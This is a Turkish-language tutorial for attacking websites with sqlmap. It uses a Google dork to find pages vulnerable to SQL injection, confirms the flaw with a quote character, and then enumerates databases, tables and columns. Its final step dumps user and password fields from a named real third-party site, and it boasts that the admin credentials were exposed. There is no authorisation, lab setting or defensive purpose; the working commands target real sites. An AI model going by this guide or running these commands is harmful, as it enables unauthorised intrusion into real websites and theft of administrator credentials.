SQLMAP-
- Kali linux uygulamalardan Exploit Tool bölümünden sqlmap i seçiyoruz
- İlk önce sqlmapte bir dork taraması yapalım.
- Kod:
sqlmap -g inurl:"newspage.php?="

- Bize bu dorka uygun siteleri taradı ve 67 site buldu verilen linklere sağtık yapıp bağlantıyı açınız ve bulunan açığın sonuna (') bu işareti koyup gerçekten varmı yokmu kontrol ediniz.



- Olmayan sitelere resimde görüldüğü gibi n yazıp geçebilirsiniz.
- Evet şimdi açıklı bir siteyi bulduk bununla admin bilgilerini bulacağız yeni bir sqlmap açıyoruz uygulamalardan.
- Kod:
sqlmap -u hedefsite açığı --dbs
sondaki -- dbs databes çekmek içindir

- İlk gelen beyazlı kısma yes diyoruz ve devam ediyor.

- İkinci gelen kısma yes yani riskli yazan ikinci kısma no diyoruz sonraki gelen kısma tekrar yes diyoruz.

- Resimde görüdüğü üzere databesleri çekti information shema yazan her sitede olur bize admin panelinin olduğu tablo lazım olduğu için onu yazıyoruz.
- Kod:
sqlmap -u http://www.emilcap.it/newspage.php?id=17 multiweb --tables
sqlmap -u site açığı tablo ismi --tables

- Bize o databeste bulunan tabloları çekti gördüğünüz gibi şimdi admin user username gibi bölümlere ulaşabileceğimiz kolumları çekicez.
- Kod:
sqlmap -u http://www.emilcap.it/newspage.php?id=17 -D multi_web -T sitiLogin --columns
sqlmap -u Site açığı -D bulunduğu tablo -T çekeceğiniz kolon--columns

- Gördüğünüz üzere geldi ve şimdi göstemesini istediğiniz bölümleri çekicez.
- Kod:
sqlmap -u http://www.emilcap.it/newspage.php?id=17 -D multi_web -T sitiLogin -C user,password --dump
sqlmap -u site açığı -D bunuduğu tablo -T bulunduğu kolon -C ve admin paneli bilgilerinin olduğu bölümler --dump
sondaki dump ta göster demek.

- Gördüğünüz üzere admin ve şifreler ortaya çıktı.
- Site Admin panelini bulmaya geldi şimdi iş bunun içinse takipte kalınız

